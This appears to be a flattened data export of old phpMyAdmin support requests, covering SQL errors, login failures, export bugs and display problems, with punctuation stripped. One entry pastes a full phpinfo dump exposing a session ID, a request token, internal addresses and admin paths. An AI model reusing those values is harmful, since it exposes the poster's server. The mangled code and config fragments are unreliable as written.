varchar 25 ) default NULL , `fontface1` varchar 50 ) default NULL , `fontface2` varchar 50 ) default NULL , `fontface3` varchar 50 ) default NULL , `fontsize1` tinyint 4 ) default NULL , `fontsize2` tinyint 4 ) default NULL , `fontsize3` tinyint 4 ) default NULL , `fontcolor1` varchar 6 ) default NULL , `fontcolor2` varchar 6 ) default NULL , `fontcolor3` varchar 6 ) default NULL , `span class1` varchar 25 ) default NULL , `span class2` varchar 25 ) default NULL , `span class3` varchar 25 ) default NULL , `img size poll` smallint 5 ) unsigned default NULL , `img size privmsg` smallint 5 ) unsigned default NULL , PRIMARY KEY `themes id` ) ) TYPE = MYISAM AUTO INCREMENT =2 MySQL said 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near Database ndp Table phpbb themes running on localhost CREAT I also noticed the same error 1046, error in syntax when trying to grant or revoke users at the command line.
I resorted to cutting and pasting code out of the manual and I still got this error.
I am assuming the manual is correct, but that the error isn t precisely reflecting what I am doing wrong that is, it s not really an error in my syntax, but that s how it s being interpreted.
It s been a long time since DOS 6.2) that I ve worked with a command line and I m a bit rusty.
Do I just not know what I am doing, or is this a bug with MySQL, or what?
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 548 https sourceforge.net p phpmyadmin support requests 548 Original author alanna Found in version 2.5.7 pl1","bug"
"24444","2365","Missing Structure View.
I hope this is the correct place to get an answer on this.
In my 2.5.3 I am having a problem with on of my tables, I can view the structure of all tables bar one, I was able to view the structure of that table and I was adding lines to it when I added a line that was already in the table, error came up saying line name already excisted click back, so I clicked back and the page went blank, ever since then when I click on that table and click in the structure tab I get a blank page.
Im not sure if this is a bug, I could not find anything on it.
Any help would be appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 549 https sourceforge.net p phpmyadmin support requests 549 Original author slyls1 Found in version 2.5.3","bug"
"24444","2366","inserts garbage, cannot edit.
inserting a new row picks up garbage from the preceding field and drops it into the first line of the field being edited.
It is not possible to edit this row.
The garbage includes gremlins.
phpMyAdmin 2.60 not pl1), MySQL 4.1.1 alpha, Apache, etc.
This is MacOS X 10.3.5 with vanilla Apache and PHP 4.3.4.
Sounds like a memory leak to me, or worse.
Original URL https sourceforge.net p phpmyadmin support requests 556 https sourceforge.net p phpmyadmin support requests 556 Original author grikdog Found in version 2.6.0 rc3","bug"
"24444","2367","HTTP 500 Error.
I just installed mysql 4.0.18 nt, php 4.3.6, and phpMyAdmin 2.5.6 on my laptop running WinXP Pro SP2) for dev purposes.
Both PHP and mySQL seem be operating fine.
However once I bring up phpMyAdmin I get the home page and login.
I currently have phpMyAdmin configured for cookie auth.
Then I get usual frames but they each have a HTTP 500 Internal server error message.
Anyone have any idea what I should check?
I have the same setup on my desktop that works just fine Appreciate any help anyone might be able to lend.
Sincerely, Siggi Bjarnason siggi siggibjarnason.com Original URL https sourceforge.net p phpmyadmin support requests 550 https sourceforge.net p phpmyadmin support requests 550 Original author sbjarnason Found in version 2.5.6","bug"
"24444","2368","Inserts jumps to wrong field.
When inserting data into table using tab the cursor jumps to the function field instead of the data field.
Thus, data insertion needs more handles.
Original URL https sourceforge.net p phpmyadmin support requests 551 https sourceforge.net p phpmyadmin support requests 551 Original author jgweijer Found in version 2.6.0 pl2","bug"
"24444","2369","cannot connect to index.php for install.
I have unzipped the files per instructions to my documentroot directory and configured the config.inc.php file in the mentioned ways.
However, it is step 4 in which I have problems.
Every time I try to log into access the page to set up the phpmyadmin, it says either there is no index file or the directory is read protected, and that I do not have authorization to access the directory.
This is if I leave out the index.php part of the url.
If I put it in, the error states that the url simply does not exist, which is incorrect.
I am using the phpmyadmin packaged with the latest apache2triad version.
Any assistance would be of great help.
I plan to set up the sql database to be used with the phpBB Forum.
Original URL https sourceforge.net p phpmyadmin support requests 553 https sourceforge.net p phpmyadmin support requests 553 Original author cashida","bug"
"24444","2370","No Support for MySQL 4.1.5.
Under the following setup WinXP Pro SP2 Apache 1.3.31 MySQL 4.1.5 PHP 4.3.9 I have tested HTTP authentication for the past 2 days with config, http, and cookie.
All give the following error 1251 Client does not support authentication protocol requested by server; consider upgrading MySQL client.
Which means phpMyAdmin must support lt; MySQL 4.1.5?
Original URL https sourceforge.net p phpmyadmin support requests 560 https sourceforge.net p phpmyadmin support requests 560 Original author ricbax Found in version 2.6.0 pl2","bug"
"24444","2371","Login losing while working on myAdmin in multiple windows.
Issue with cookies probably ).
When more than one window with myAdmin is opened, any activity in one of windows make all of them lose login status user is redirected to login page.
Original URL https sourceforge.net p phpmyadmin support requests 563 https sourceforge.net p phpmyadmin support requests 563 Original author shive Found in version 2.6.0 pl2","bug"
"24444","2372","Does 2.6.0 pl1 run on Core 2?.
Is there an issue with running 2.6.0 pl1 on Fedora Core 2??
It seems to run fine on Core 1, but a few of us are having issues with Core 2, any help would be great, thank you.
Original URL https sourceforge.net p phpmyadmin support requests 554 https sourceforge.net p phpmyadmin support requests 554 Original author chiv sc","bug"
"24444","2373","Export of Database freezes on .sql file download.. Summary Mandrake 10 Apache 2.0.48 MySQL 4.0.18 PHP 4.3.4 Desktop XP Pro SP2 Problem When I try to dump an .sql file of a db larger than 3.2MB the download freezes and stays at 630kb s. The server is on my LAN and I ve had no other problems with smaller db s. I ve tried different versions of phpmyadmin and they do the same thing.
SERVER INFO PHP Version 4.3.4 System Linux worknet.xxxxxxxxxxx.biz 2.6.3 7mdksecure 1 SMP Wed Mar 17 14 42 34 CET 2004 i686 Build Date Jul 13 2004 20 39 11 Configure Command .
configure prefix= usr exec prefix= usr bindir= usr bin sbindir= usr sbin sysconfdir= etc datadir= usr share includedir= usr include libdir= usr lib libexecdir= usr lib localstatedir= var lib sharedstatedir= usr com mandir= usr share man infodir= usr share info enable discard path disable force cgi redirect enable shared disable static disable debug disable rpath enable pic enable inline optimization enable memory limit with config file path= etc with config file scan dir= etc php with pear= usr share pear enable magic quotes enable debugger enable track vars with exec dir= usr bin with versioning with mod charset with regex=php enable track vars enable trans sid enable safe mode enable ctype enable ftp with gettext= usr enable posix enable session enable sysvsem enable sysvshm enable yp with openssl= usr without kerberos with ttf with freetype dir= usr with zlib= usr with zlib= usr with zlib dir= usr without pear Extensions listed here are or will be soon) available as external modules.
To install one or all of these, use urpmi php EXTENSION NAME mysql pgsql sqlite gd imap ldap bcmath bz2 calendar cpdf crack curl cyrus db dba dba bundle dbase dbx dio domxml exif fbsql fdf filepro fribidi gmp hwapi hyperwave iconv imagick informix ingres ii interbase ircg java mbstring mcal mcrypt mcve mhash mime magic ming mnogosearch msession msql mssql ncurses notes oci8 odbc oracle overload ovrimos pam auth pcntl pdf pfpro pspell qtdom readline recode rrdtool shmop snmp smbauth sockets swf sybase sybase ct sysvmsg tokenizer wddx xml xmlrpc xslt yaz zip adodb mmcache apd cybercash cybermut mono mqseries netools python spplus spread inifile Server API Apache 2.0 Handler Virtual Directory Support disabled Configuration File php.ini) Path etc php.ini Scan this dir for additional .ini files etc php additional .ini files parsed etc php 23 gd.ini, etc php 26 imap.ini, etc p hp 27 ldap.ini, etc php 34 mysql.ini, etc php 39 pgsql.
ini, etc php 52 xml.ini PHP API 20020918 PHP Extension 20020429 Zend Extension 20021010 Debug Build no Thread Safety disabled Registered PHP Streams php, http, ftp, https, ftps, compress.zlib This program makes use of the Zend Scripting Language Engine Zend Engine v1.3.0, Copyright c) 1998 2003 Zend Technologies PHP Credits Configuration PHP Core Directive Local Value Master Value allow call time pass reference On On allow url fopen On On always populate raw post data Off Off arg separator.input arg separator.output asp tags Off Off auto append file no value no value auto prepend file no value no value browscap no value no value default charset no value no value default mimetype text html text html define syslog variables Off Off disable classes no value no value disable functions no value no value display errors On On display startup errors Off Off doc root no value no value docref ext no value no value docref root no value no value enable dl On On error append string no value no value error log no value no value error prepend string no value no value error reporting 2039 2039 expose php On On extension dir usr lib php extensions usr lib php extensi ons file uploads On On gpc order GPC GPC highlight.bg FFFFFF FFFFFF highlight.comment FF8000 FF8000 highlight.default 0000BB 0000BB highlight.html 000000 000000 highlight.keyword 007700 007700 highlight.string DD0000 DD0000 html errors On On ignore repeated errors Off Off ignore repeated source Off Off ignore user abort Off Off implicit flush Off Off include path .
usr lib php usr share pear .
usr lib ph p usr share pear log errors Off Off log errors max len 1024 1024 magic quotes gpc On On magic quotes runtime Off Off magic quotes sybase Off Off max execution time 42000 42000 max input time 86000 86000 memory limit 32M 32M open basedir no value no value output buffering no value no value output handler no value no value post max size 10M 10M precision 12 12 register argc argv Off Off register globals On On report memleaks On On safe mode Off Off safe mode exec dir no value no value safe mode gid Off Off safe mode include dir no value no value sendmail from me localhost.com me localhost.com sendmail path usr sbin sendmail t i usr sbin sendmail t i serialize precision 100 100 short open tag On On SMTP localhost localhost smtp port 25 25 sql.safe mode Off Off track errors Off Off unserialize callback func no value no value upload max filesize 100M 100M upload tmp dir no value no value user dir no value no value variables order EGPCS EGPCS xmlrpc error number 0 0 xmlrpc errors Off Off y2k compliance On On apache2handler Apache Version Apache AdvancedExtranetServer 2.0.48 Mandrake Linux 6.6.100mdk) mod perl 1.99 11 Perl v5.8.3 mod ssl 2.0.48 OpenSSL 0.9.7c PHP 4.3.4 Apache API Version 20020903 Server Administrator admin xxxxxxxxxxx.com Hostname Port xxxxxxxxxxx.biz 0 User Group apache 73) 73 Max Requests Per Child 0 Keep Alive on Max Per Connection 100 Timeouts Connection 300 Keep Alive 15 Virtual Server Yes Server Root etc httpd 2.0 Loaded Modules core prefork http core mod so mod access mod auth mod auth anon mod auth digest mod include mod log config mod logio mod env mod expires mod headers mod usertrack mod setenvif mod mime mod status mod autoindex mod asis mod info mod cgi mod vhost alias mod negotiation mod dir mod imap mod actions mod userdir mod alias mod rewrite mod proxy proxy http mod ssl mod cache mod disk cache mod suexec mod php4 mod perl Directive Local Value Master Value engine 1 1 last modified 0 0 xbithack 0 0 Apache Environment Variable Value HTTP ACCEPT HTTP ACCEPT LANGUAGE en us HTTP ACCEPT ENCODING gzip, deflate HTTP USER AGENT Mozilla 4.0 compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) HTTP HOST 192.168.0.140 HTTP CONNECTION Keep Alive HTTP COOKIE sessionid=9446eda0a48cbf0cd5462d2bd151af0f PATH sbin usr sbin bin usr bin usr X11R6 bin SERVER SIGNATURE no value SERVER SOFTWARE Apache AdvancedExtranetServer 2.0.48 Mandrake Linux 6.6.100mdk) mod perl 1.99 11 Perl v5.8.3 mod ssl 2.0.48 OpenSSL 0.9.7c PHP 4.3.4 SERVER NAME xxxxxxxxxxx.biz SERVER ADDR 192.168.0.140 SERVER PORT 80 REMOTE ADDR 192.168.0.115 DOCUMENT ROOT var www html dotbiz SERVER ADMIN admin xxxxxxxxxxx.com SCRIPT FILENAME var www html dotbiz erpworknet ad min phpinfo.php REMOTE PORT 4879 GATEWAY INTERFACE CGI 1.1 SERVER PROTOCOL HTTP 1.1 REQUEST METHOD GET QUERY STRING sessionid=9446eda0a48cbf0cd5462d2bd151af0f kp3=2e8 1fb58b9bf7f65c353151e0c18a2c3 domain=xxxxxxxxxxx.bi z REQUEST URI erpworknet admin phpinfo.php?
sessionid=9446eda0a48cbf0cd5462d2bd151af0f kp3=2e8 1fb58b9bf7f65c353151e0c18a2c3 domain=xxxxxxxxxxx.bi z SCRIPT NAME erpworknet admin phpinfo.php HTTP Headers Information HTTP Request Headers HTTP Request GET erpworknet admin phpinfo.php?
sessionid=9446eda0a48cbf0cd5462d2bd151af0f kp3=2e8 1fb58b9bf7f65c353151e0c18a2c3 domain=xxxxxxxxxxx.bi z HTTP 1.1 Accept Accept Language en us Accept Encoding gzip, deflate User Agent Mozilla 4.0 compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Host 192.168.0.140 Cookie sessionid=9446eda0a48cbf0cd5462d2bd151af0f HTTP Response Headers X Powered By PHP 4.3.4 Cache Control no store, no cache, must revalidate, post check=0, pre check=0 Pragma no cache Set Cookie sessionid=9446eda0a48cbf0cd5462d2bd151af0f; path= Expires Thu, 19 Nov 1981 08 52 00 GMT Transfer Encoding chunked Content Type text html; charset=One ctype ctype functions enabled ftp FTP support enabled gd GD Support enabled GD Version bundled 2.0.15 compatible) FreeType Support enabled FreeType Linkage with freetype GIF Read Support enabled JPG Support enabled PNG Support enabled WBMP Support enabled XBM Support enabled gettext GetText Support enabled imap IMAP c Client Version 2001 SSL Support enabled ldap LDAP Support enabled RCS Version Id ldap.c,v 1.130.2.9 2003 10 07 00 36 27 iliaa Exp Total Links 0 unlimited API Version 2004 Vendor Name OpenLDAP Vendor Version 20122 mysql MySQL Support enabled Active Persistent Links 1 Active Links 1 Client API version 4.0.18 MYSQL MODULE TYPE none MYSQL SOCKET var lib mysql mysql.sock MYSQL INCLUDE no value MYSQL LIBS no value Directive Local Value Master Value mysql.allow persistent On On mysql.connect timeout 60 60 mysql.default host no value no value mysql.default password no value no value mysql.default port no value no value mysql.default socket no value no value mysql.default user no value no value mysql.max links Unlimited Unlimited mysql.max persistent Unlimited Unlimited mysql.trace mode Off Off openssl OpenSSL support enabled OpenSSL Version OpenSSL 0.9.7c 30 Sep 2003 pcre PCRE Perl Compatible Regular Expressions) Support enabled PCRE Library Version 4.3 21 May 2003 pgsql PostgreSQL Support enabled Active Persistent Links 0 Active Links 0 Directive Local Value Master Value pgsql.allow persistent On On pgsql.auto reset persistent Off Off pgsql.ignore notice Off Off pgsql.log notice Off Off pgsql.max links Unlimited Unlimited pgsql.max persistent Unlimited Unlimited posix Revision Revision 1.51.2.2 session Session Support enabled Registered save handlers files user Directive Local Value Master Value session.auto start Off Off session.bug compat 42 On On session.bug compat warn On On session.cache expire 180 180 session.cache limiter nocache nocache session.cookie domain no value no value session.cookie lifetime 0 0 session.cookie path session.cookie secure Off Off session.entropy file no value no value session.entropy length 0 0 session.gc divisor 100 100 session.gc maxlifetime 14400 1440 session.gc probability 1 1 session.name sessionid PHPSESSID session.referer check no value no value session.save handler files files session.save path tmp tmp session.serialize handler php php session.use cookies On On session.use only cookies Off Off session.use trans sid Off Off standard Regex Library Bundled library enabled Dynamic Library Support enabled Path to sendmail usr sbin sendmail t i Directive Local Value Master Value assert.active 1 1 assert.bail 0 0 assert.callback no value no value assert.quiet eval 0 0 assert.warning 1 1 auto detect line endings 0 0 default socket timeout 60 60 safe mode allowed env vars PHP PHP safe mode protected env vars LD LIBRARY PATH LD LIBRARY PATH url rewriter.tags a=href,area=href,frame=src,input=src,form=,fieldset= a=href,area=href,frame=src,input=src,form=,fieldset= user agent no value no value xml XML Support active XML Namespace Support active EXPAT Version expat 1.95.6 yp YP Support enabled zlib ZLib Support enabled Compiled Version 1.2.1 Linked Version 1.2.1 Directive Local Value Master Value zlib.output compression Off Off zlib.output compression level 1 1 zlib.output handler no value no value Additional Modules Module Name sysvsem sysvshm Environment Variable Value LESSKEY etc .less LC PAPER en US LC ADDRESS en US LC MONETARY en US HOSTNAME worknet.xxxxxxxxxxx.biz SHELL bin bash LC SOURCED 1 HISTSIZE 1000 LC NUMERIC en US QTDIR usr lib qt3 LOCPATH etc locale LC TELEPHONE en US PATH sbin usr sbin bin usr bin usr X11R6 bin LC MESSAGES en US LC IDENTIFICATION en US LC COLLATE en US INPUTRC etc inputrc LANG en US LC MEASUREMENT en US SSH ASKPASS usr lib ssh gnome ssh askpass SHLVL 3 LANGUAGE en US en GCONF TMPDIR tmp LESS MM LC CTYPE en US SSH CONNECTION ffff 192.168.0.115 4747 ffff 192.168.0.140 22 LC TIME en US TEXTDOMAINDIR etc locale G BROKEN FILENAMES 1 LC NAME en US OLDPWD etc httpd sbin initlog PHP Variables Variable Value PHP SELF erpworknet admin phpinfo.php REQUEST[ sessionid ] 9446eda0a48cbf0cd5462d2bd151af0f REQUEST[ kp3 ] 2e81fb58b9bf7f65c353151e0c18a2c3 REQUEST[ domain ] xxxxxxxxxxx.biz GET[ sessionid ] 9446eda0a48cbf0cd5462d2bd151af0f GET[ kp3 ] 2e81fb58b9bf7f65c353151e0c18a2c3 GET[ domain ] xxxxxxxxxxx.biz COOKIE[ sessionid ] 9446eda0a48cbf0cd5462d2bd151af0f SERVER[ HTTP ACCEPT ] SERVER[ HTTP ACCEPT LANGUAGE ] en us SERVER[ HTTP ACCEPT ENCODING ] gzip, deflate SERVER[ HTTP USER AGENT ] Mozilla 4.0 compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) SERVER[ HTTP HOST ] 192.168.0.140 SERVER[ HTTP CONNECTION ] Keep Alive SERVER[ HTTP COOKIE ] sessionid=9446eda0a48cbf0cd5462d2bd151af0f SERVER [ PATH ] sbin usr sbin bin usr bin usr X11R6 bin SERVER[ SERVER SIGNATURE ] no value SERVER[ SERVER SOFTWARE ] Apache AdvancedExtranetServer 2.0.48 Mandrake Linux 6.6.100mdk) mod perl 1.99 11 Perl v5.8.3 mod ssl 2.0.48 OpenSSL 0.9.7c PHP 4.3.4 SERVER[ SERVER NAME ] xxxxxxxxxxx.biz SERVER[ SERVER ADDR ] 192.168.0.140 SERVER[ SERVER PORT ] 80 SERVER[ REMOTE ADDR ] 192.168.0.115 SERVER[ DOCUMENT ROOT ] var www html dotbiz SERVER[ SERVER ADMIN ] admin xxxxxxxxxxx.com SERVER [ SCRIPT FILENAME ] var www html dotbiz erpworknet admin phpinfo.php SERVER[ REMOTE PORT ] 4879 SERVER[ GATEWAY INTERFACE ] CGI 1.1 SERVER[ SERVER PROTOCOL ] HTTP 1.1 SERVER[ REQUEST METHOD ] GET SERVER[ QUERY STRING ] sessionid=9446eda0a48cbf0cd5462d2bd151af0f kp3=2e8 1fb58b9bf7f65c353151e0c18a2c3 domain=xxxxxxxxxxx.bi z SERVER [ REQUEST URI ] erpworknet admin phpinfo.php?
sessionid=9446eda0a48cbf0cd5462d2bd151af0f kp3=2e8 1fb58b9bf7f65c353151e0c18a2c3 domain=xxxxxxxxxxx.bi z SERVER [ SCRIPT NAME ] erpworknet admin phpinfo.php SERVER[ PHP SELF ] erpworknet admin phpinfo.php SERVER [ PATH TRANSLATED ] var www html dotbiz erpworknet admin phpinfo.php ENV[ LESSKEY ] etc .less ENV[ LC PAPER ] en US ENV[ LC ADDRESS ] en US ENV[ LC MONETARY ] en US ENV[ HOSTNAME ] worknet.xxxxxxxxxxx.biz ENV[ SHELL ] bin bash ENV[ LC SOURCED ] 1 ENV[ HISTSIZE ] 1000 ENV[ LC NUMERIC ] en US ENV[ QTDIR ] usr lib qt3 ENV[ LOCPATH ] etc locale ENV[ LC TELEPHONE ] en US ENV [ PATH ] sbin usr sbin bin usr bin usr X11R6 bin ENV[ LC MESSAGES ] en US ENV[ LC IDENTIFICATION ] en US ENV[ LC COLLATE ] en US ENV[ INPUTRC ] etc inputrc ENV[ LANG ] en US ENV[ LC MEASUREMENT ] en US ENV[ SSH ASKPASS ] usr lib ssh gnome ssh askpass ENV[ SHLVL ] 3 ENV[ LANGUAGE ] en US en ENV[ GCONF TMPDIR ] tmp ENV[ LESS ] MM ENV[ LC CTYPE ] en US ENV[ SSH CONNECTION ] ffff 192.168.0.115 4747 ffff 192.168.0.140 22 ENV[ LC TIME ] en US ENV[ TEXTDOMAINDIR ] etc locale ENV[ G BROKEN FILENAMES ] 1 ENV[ LC NAME ] en US ENV[ OLDPWD ] etc httpd ENV[ ] sbin initlog PHP License This program is free software; you can redistribute it and or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file LICENSE This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license php.net.
Original URL https sourceforge.net p phpmyadmin support requests 555 https sourceforge.net p phpmyadmin support requests 555 Original author demoguy24","bug"
"24444","2374","PHP injection protection gives 406 errors.
My ISP just restricted the server so that whenever an url is inserted as query statement in a GET type of action like http www.mysite.com phpMyAdmin sql.php?
lang=this field=that value=http 21 27 27www.whateversite.com) you will get a 406 error page.
As long as everything goes through GET statements and not with POST, phpMyAdmin is prety useless... Any idea how to bypass this?
Original URL https sourceforge.net p phpmyadmin support requests 568 https sourceforge.net p phpmyadmin support requests 568 Original author virogo","bug"
"24444","2375","problem utf8< >latin comparison using pmadb.
Hi, after using phpmyadim 2.5.6 for months and being very happy with it, I downloaded the latest 2.6.0 version.
While 2.5.7 is runnig without any problem, 2.6.0 at startup gives lots of errors 1266 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = I re created the PMA infrastructure DB by feeding create tables.sql into mysql, but all tables are created using latin1 swedish ci charset.
Then I tried upgrade tables mysql 4 1 2 .sql which, as far as I understand, changes all tables to UTF8.
But when I feed this file into mysql, I get the error ERROR 1071 at line 53 Specified key was too long.
Max key length is 500 So I m stuck here...
Original URL https sourceforge.net p phpmyadmin support requests 557 https sourceforge.net p phpmyadmin support requests 557 Original author norzaw","bug"
"24444","2376","Modify Delete buttons not showing in browse table.
The Modify Delete buttons are not showing at the left or right when displaying the content of a table even if the config.inc.php is OK cfg[ ModifyDeleteAtLeft ] = TRUE; and org cfg[ ModifyDeleteAtRight ] = TRUE;) I m using PHP 5.0.1 with mySQL 4.1.5 gamma on FreeBSD 5.2.1 RELEASE Original URL https sourceforge.net p phpmyadmin support requests 558 https sourceforge.net p phpmyadmin support requests 558 Original author universaltonton","bug"
"24444","2377","CGI Error 401. when i used http Authentication mode this message appeared CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are Status 401 WWW Authenticate Basic realm= phpMyAdmin running on localhost 0 when i replaced it to config , it working bitter can u help me ?
thank you Original URL https sourceforge.net p phpmyadmin support requests 572 https sourceforge.net p phpmyadmin support requests 572 Original author topws","bug"
"24444","2378","siteadmin login.php.
How to reset the password for siteadmin login.php?
Please help me.
Original URL https sourceforge.net p phpmyadmin support requests 559 https sourceforge.net p phpmyadmin support requests 559 Original author atechy Found in version 2.5.6","bug"
"24444","2379","Create More Databases than Allowed.
Apache version 1.3.31 Unix) PHP version 4.3.9 MySQL version 4.0.20 standard phpMyAdmin version 2.6.0 pl2 Using an account that is limited to 2 MySQL databases on a free webhosting server, I can create more databases than allowed using phpMyAdmin.
When I go to the home page of phpMyAdmin, the Create new database text box already contains a name.
If I click Create without changing the name of the database, phpMyAdmin creates a database, even though I have already met or exceeded my MySQL db quota.
The names that are suggested are names of databases that I had created at one point and later deleted because I didn t need them.
These already used and removed) names are the only ones suggested by phpMyAdmin and the only ones it allows me to create.
If I use a non suggested name and I have already met or exceeded the number of allowed databases, I receive an error as follows 1044 Access denied for user allscave localhost to database allscave test .
Also, once the already used suggested db names have run out, there is no text box under the Create new database text and instead No Privileges is dislplayed in red text.
Original URL https sourceforge.net p phpmyadmin support requests 561 https sourceforge.net p phpmyadmin support requests 561 Original author allscave Found in version 2.6.0 pl2","bug"
"24444","2380","uncompressed export not working when using Windows XP SP2.
Exporting to a file using IE and Windows XP SP 2 is not working.
If you export using as a .zip or as a .bgz file everything is working fine but us you try to export in an uncompressed file the file dialog asking to save the file will never be displayed.
I reproduced this problem using 2 differents servers windows IIS and NetBSD Apache) Original URL https sourceforge.net p phpmyadmin support requests 562 https sourceforge.net p phpmyadmin support requests 562 Original author ccaron","bug"
"24444","2381","NO databases seen by PMA.
Unzipped 2.6.0.pl2 on my XP machine, edited config.inc.php, and FTPed everything to myphpadmin on web Linux Apache server.
Following are issues encountered 1) When PmaAbsoluteUri is other than , index.php displays as empty page; 2) When PmaAbsoluteUri is , index.php displays ok but no databases displayed, msg No Privileges and msg The cfg[ PmaAbsoluteUri ] directive MUST be set in your configuration file!
config.inc.php is attached in case it helps.
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 564 https sourceforge.net p phpmyadmin support requests 564 Original author deputy5211 Found in version 2.6.0 pl2","bug"
"24444","2382","2.6.0 pl2) Error 500 in http auth type.
Hello I m running PhpMyAdmin on Apache 2.0.49 Win32) witdh PHP4.3.6 MySQL 4.0.20a nt .
When i set auth type to http, it show me the login screen and when i enter the login information and press enter, the screen comes again 3 times.
After this 3 times, it returns me a 500 Error..
Thanks bye advance.
Adrian Original URL https sourceforge.net p phpmyadmin support requests 565 https sourceforge.net p phpmyadmin support requests 565 Original author adriannaegeli Found in version 2.6.0 pl2","bug"
"24444","2383","Why is field name underlined?.
I added a field named path to a table.
Now when I click properties to display the table structure, this field, and only this field, has its name displayed with a broken underline.
I thought maybe path was a reserved word in MySQL, but it s not in the list of reserved words in the docs.
What does this mean?
Original URL https sourceforge.net p phpmyadmin support requests 579 https sourceforge.net p phpmyadmin support requests 579 Original author roblewis Found in version 2.6.0 pl1","bug"
"24444","2384","2.6.0 pl2 mysql 4.1.7 => apache seg fault.
hitting the browse button within phpmyadmin is causing a seg fault in apache.
i recompile the php.srpm after upgrading to mysql 4.1.7. but i still get a Client API version 4.0.20 in the phpinfo ) any clues, i guess it has something to do with the collations.
i use redhat 9 mysql 4.1.7 official rpm fedora httpd 2.0.52 and php4.3.9 srpms regards .nowrap Original URL https sourceforge.net p phpmyadmin support requests 566 https sourceforge.net p phpmyadmin support requests 566 Original author nowrap Found in version 2.6.0 pl2","bug"
"24444","2385","Unsupported Authentication Protocol 2.6 pl2).
Hello When attempting to start phpMyAdmin, I m greeted with the following message 1251 Client does not support authentication protocol requested by server; consider upgrading MySQL client I ve verified my settings are correct in config.inc.php; and that my version of mySQL is supported could it be an issue relating to IIS?
Here s my info Win XP SP2, mySQL 4.1.7, phpMyAdmin 2.6 pl2, PHP 4.3.9 Windows Installer version), IIS 5.1.
Original URL https sourceforge.net p phpmyadmin support requests 567 https sourceforge.net p phpmyadmin support requests 567 Original author neolinery Found in version 2.6.0 pl2","bug"
"24444","2386","Database export doesn t work in Konqueror..
The database export doesn t work in Konqueror.
This is what I did select the database in the tree view.
pressed export .
pressed select all checked save as file .
If I open the downloaded file in an text editor, I see a HTML page with an php error missing parameter WHAT ).
Original URL https sourceforge.net p phpmyadmin support requests 569 https sourceforge.net p phpmyadmin support requests 569 Original author codingdomain Found in version 2.6.0 pl2","bug"
"24444","2387","can t log.
when I want to log, I have this message urldecode the db name if isset lightm db)) \{ no longer urlencoded because of html entities in the db name db = urldecode lightm db); db = lightm db; unset lightm db); \} url query = PMA generate common url isset db) ?
db ); header Content Type text html; charset= .
GLOBALS[ charset ]); require once .
libraries relation.lib.php ); cfgRelation = PMA getRelationsParam ); if cfg[ QueryHistoryDB ] cfgRelation[ historywork ]) \{ PMA purgeHistory cfg[ Server ][ user ]); \} phpmain hash = md5 cfg[ PmaAbsoluteUri ]); phpmain hash js = time ); ?
gt; .
\n ; echo .
\n ; echo .
\n ; echo \n ; echo Why?
How I can use without problem?
Marc Original URL https sourceforge.net p phpmyadmin support requests 570 https sourceforge.net p phpmyadmin support requests 570 Original author mbk28 Found in version 2.5.7 pl1","bug"
"24444","2388","missing icons after mysql 4.0 to 4.1 upgrade.
I just updated my mysql installation from 4.0 to 4.1.
I took care of updating the phpmyadmin pma database using the update script, and that got rid of the collation char set errors.
Now I can browse my tables, etc.
The bug is that browsing some but not all) tables, the red X delete row icon is missing and has been replaced with a black ?
question mark).
When I mouseover the ?
, it says You should define a primary key for this table .
The ?
is not clickable.
Additionally, some tables are missing both the X icon, and the edit row icon the pencil), both replaced with ?
.
I ve also tried this with a phpMyAdmin 2.6.1 dev release yesterday) and the problems are still there.
Backing off to mysql 4.0 fixes the problem, as does actually going ahead and adding a primary key to the table.
Is this a bug?
Could it still be related to collation charset problems?
I m not using anything other than utf8 or latin1.)
Thanks bCT Original URL https sourceforge.net p phpmyadmin support requests 571 https sourceforge.net p phpmyadmin support requests 571 Original author bcthomas Found in version 2.6.0 pl2","bug"
"24444","2389","Customise sql.php.
How would I go about customising sql.php and read dump.php to make an installer for my project?
Original URL https sourceforge.net p phpmyadmin support requests 587 https sourceforge.net p phpmyadmin support requests 587 Original author voltagex Found in version 2.6.0 rc3","bug"
"24444","2390","Entire contents not displayed.
I m attaching a file that contains two screenshots to show the problem.
Please look at the content of mkt quantity in the first image file.
I then clicked the edit icon and got the second image.
Note the contents of mkt quantity there The contents are truncated after a newline that is embedded in the text.
I cannot scroll to the right and see more text there.
When I look at the browser source, I see that the additional content is there.
lt;input type= text name= fields[multi edit][ 60mkt id 60 3D 274526 27][mkt quantity] value= Set up Charge is 30.00 r).
amp;lt;br amp;gt; Embossed Image Area is 1.75 amp;quot; wide by 1.75 amp;quot; high.
amp;lt;br amp;gt; amp;lt;br amp;gt;Artwork provided must be an Adobe Illustrator .eps file.
The artwork must be created in a vector format and be black and white.
Grayscale color fills will not be acc size= 40 maxlength= 255 class= textfield onchange= return unNullify mkt quantity , [multi edit][ 60mkt id 60 3D 274526 27] ) tabindex= 7 id= field 6 3 gt; lt; td gt; Using MySQL 4.1.7 Mozilla 1.7.3 for Mac OS X I tried it on a windows box running IE 5.5 and got a different error.
There was a one line text box with all the content.
I could scroll and see it all, but there was not a multi line text area like for the field mkt descr.
Thanks, Damian Original URL https sourceforge.net p phpmyadmin support requests 588 https sourceforge.net p phpmyadmin support requests 588 Original author damianb Found in version 2.6.0 rc3","bug"
"24444","2391","comments on table structure.
please return the comments column in field modify like in previous phpmyadmin version.
Original URL https sourceforge.net p phpmyadmin support requests 573 https sourceforge.net p phpmyadmin support requests 573 Original author adwin wijaya","bug"
"24444","2392","?
instead of edit icon.
Hello !
I have a longtext field but sometimes i cannot edit.
There is a ?
sign instead of the edit icon ?!
thx for help have 2.6.0 pl3 Original URL https sourceforge.net p phpmyadmin support requests 590 https sourceforge.net p phpmyadmin support requests 590 Original author petesky Found in version 2.6.0 pl2","bug"
"24444","2393","HTDocs Additional Document Path.
Hello.
